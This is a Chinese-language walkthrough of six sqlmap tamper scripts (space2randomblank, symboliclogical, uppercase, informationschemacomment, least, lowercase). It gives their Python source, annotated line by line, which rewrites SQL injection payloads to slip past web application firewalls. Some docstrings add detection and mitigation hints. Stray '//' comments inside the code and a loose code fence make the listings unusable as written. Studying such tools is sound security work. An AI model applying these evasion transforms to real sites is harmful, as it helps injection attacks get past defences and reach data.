sqlmap中的tamper 脚本分析

space2randomblank

作用:空格替换为备选字符集中的随机字符
例子

tamper('select id from users')
'select%0Did%0Dfrom%0Ausers'

详细注释

#!/usr/bin/env python//此处用法为:程序到env设置里查找python的安装路径,再调用对应路径下的解释器程序完成操作

"""  //python 的多行注释符
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import random

from lib.core.compat import xrange //导入sqlmap中的lib/core/compat中的xrange函数
from lib.core.enums import PRIORITY//导入sqlmap中lib/core/enums 中的PRIORITY函数

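__priority__ = PRIORITY.LOW  # tamper priority level, taken from lib.core.enums.PRIORITY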

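def dependencies():
    """Declare external requirements for this tamper script.

    There are none beyond sqlmap itself and the standard library, so this is a
    no-op kept for uniformity with the other tamper scripts on this page.
    """
    pass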

def tamper(payload, **kwargs)://定义tamper  脚本,payload, **kwargs为定义的参数
    """  //多行注释符
    Replaces space character (' ') with a random blank character from a valid set of alternate characters  //此处为tamper说明,以便使用该脚本

    Tested against:  //用于多种数据库,并且作用与弱防护效果的防火墙
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass several web application firewalls

    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')
    'SELECT%0Did%0CFROM%0Ausers'
    """

    # ASCII table:
    #   TAB     09      horizontal TAB
    #   LF      0A      new line
    #   FF      0C      new page
    #   CR      0D      carriage return
    blanks = ("%09", "%0A", "%0C", "%0D")
    retVal = payload

    if payload: //判断payload
        retVal = "" //将retVal 赋值为空语句
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload))://xrange为一个生成器
            if not firstspace:
                if payload[i].isspace()://检测字符串是否只由空格组成
                    firstspace = True//将true 赋给firstspace
                    retVal += random.choice(blanks)//返回一个列表,元组或字符串的随机项
                    continue//跳出本次循环

            elif payload[i] == '\''://判断字符是否为'\'
                quote = not quote

            elif payload[i] == '"'://判断字符是否为"
                doublequote = not doublequote

            elif payload[i] == ' ' and not doublequote and not quote:
                retVal += random.choice(blanks)//返回一个列表,元组或字符串的随机项
                continue//跳出本次循环

            retVal += payload[i]

    return retVal//返回随机字符

symboliclogical

作用:AND和OR替换为&&和||

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST  # tamper priority level, taken from lib.core.enums.PRIORITY

def dependencies():
    """Placeholder hook kept for uniformity with the other tamper scripts; it declares nothing."""

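def tamper(payload, **kwargs):
    """
    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

    Notes:
        * `payload` is the string to rewrite; None and '' are returned unchanged.
          `**kwargs` is accepted for interface compatibility and not used here
        * Matching is case-insensitive and word-bounded, so e.g. ORDER or
          ANDROID are left untouched
        * The replacements are written percent-encoded (%26%26 and %7C%7C)
        * Detection/mitigation: percent-decode the request and match both
          spellings (AND / && and OR / ||) so the rewritten form is covered

    >>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"
    """

    if not payload:
        # None and "" come back as-is, as upstream does
        return payload

    # upper-cased keyword -> percent-encoded symbolic operator
    symbolic = {"AND": "%26%26", "OR": "%7C%7C"}

    # One case-insensitive pass instead of two nested re.sub calls; the encoded
    # replacements contain no word "AND"/"OR", so they can never be re-matched.
    return re.sub(r"(?i)\b(AND|OR)\b", lambda m: symbolic[m.group(1).upper()], payload)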

uppercase

作用:全部替换为大写值

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL  # tamper priority level, taken from lib.core.enums.PRIORITY

def dependencies():
    """Nothing to declare; present so this module has the same shape as the other tamper scripts."""

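def tamper(payload, **kwargs):
    """
    Replaces each keyword character with upper case value (e.g. select -> SELECT)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases
        * `payload` is the string to rewrite; None and '' are returned unchanged.
          `**kwargs` is accepted for interface compatibility and not used here
        * Only words whose upper-cased form is listed in kb.keywords are
          changed; every other token keeps its case
        * str.replace() is substring-based, so the same letters inside a longer
          token are upper-cased as well (upstream behaviour kept)
        * Detection/mitigation: case-insensitive keyword matching is unaffected
          by this transformation

    >>> tamper('insert')
    'INSERT'
    """

    if not payload:
        # None and "" come back as-is, as upstream does
        return payload

    retVal = payload

    # finditer walks the original string; rebinding retVal inside the loop is
    # safe because only match.group() is used, never match positions
    for match in re.finditer(r"[A-Za-z_]+", payload):
        word = match.group()

        if word.upper() in kb.keywords:
            retVal = retVal.replace(word, word.upper())

    return retVal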

informationschemacomment

作用:标识符后添加注释

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL  # tamper priority level, taken from lib.core.enums.PRIORITY

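def tamper(payload, **kwargs):
    """
    Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier

    Notes:
        * `payload` is the string to rewrite; None and '' are returned unchanged.
          `**kwargs` is accepted for interface compatibility and not used here
        * Matching is case-insensitive and only touches the identifier when it
          is immediately followed by '.'; the original spelling is kept
        * Detection/mitigation: stripping inline /**/ comments before keyword
          matching restores the original identifier

    >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
    """

    if not payload:
        # None and "" come back as-is, as upstream does
        return payload

    # \g<1> re-emits the matched identifier with its original case
    return re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)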

least

作用:替换大于号为least

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST  # tamper priority level, taken from lib.core.enums.PRIORITY

def dependencies():
    """No-op requirements hook, retained so this script mirrors the layout of the other tamper scripts."""

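def tamper(payload, **kwargs):
    """
    Replaces greater than operator ('>') with 'LEAST' counterpart

    Tested against:
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls that
          filter the greater than character
        * The LEAST clause is a widespread SQL command. Hence, this
          tamper script should work against majority of databases
        * `payload` is the string to rewrite; None and '' are returned unchanged.
          `**kwargs` is accepted for interface compatibility and not used here
        * Only the first "AND/OR <lhs> > <rhs>" occurrence is located; every
          copy of that exact text is rewritten, any other comparison is left as is
        * Detection/mitigation: the rewrite only removes the '>' character; the
          LEAST( call stays visible to keyword-aware inspection

    >>> tamper('1 AND A > B')
    '1 AND LEAST(A,B+1)=B+1'
    """

    if not payload:
        # None and "" come back as-is, as upstream does
        return payload

    # group(1): leading AND/OR plus the whitespace after it (kept verbatim)
    # group(3): left-hand operand, non-greedy up to the '>'
    # group(4): right-hand operand, a \w+ word or a single-quoted literal
    match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)

    if not match:
        return payload

    # LEAST(A,B+1)=B+1 holds exactly when A >= B+1, i.e. A > B for integer operands
    rewritten = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))

    # str.replace() rewrites every occurrence of the matched text, as upstream does
    return payload.replace(match.group(0), rewritten)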

```php

lowercase

作用:将大写字母转化成小写字母

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL  # tamper priority level, taken from lib.core.enums.PRIORITY

def dependencies():
    """Empty requirements hook; exists only to keep the usual tamper-script layout."""

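def tamper(payload, **kwargs):
    """
    Replaces each keyword character with lower case value (e.g. SELECT -> select)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * `payload` is the string to rewrite; None and '' are returned unchanged.
          `**kwargs` is accepted for interface compatibility and not used here
        * Only whole words whose upper-cased form is listed in kb.keywords are
          lower-cased; every other token keeps its case
        * str.replace() is substring-based, so the same letters inside a longer
          token are lower-cased as well (upstream behaviour kept)
        * Detection/mitigation: case-insensitive keyword matching is unaffected
          by this transformation

    >>> tamper('INSERT')
    'insert'
    """

    if not payload:
        # None and "" come back as-is, as upstream does
        return payload

    retVal = payload

    # finditer walks the original string; rebinding retVal inside the loop is
    # safe because only match.group() is used, never match positions
    for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
        word = match.group()

        if word.upper() in kb.keywords:
            retVal = retVal.replace(word, word.lower())

    return retVal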
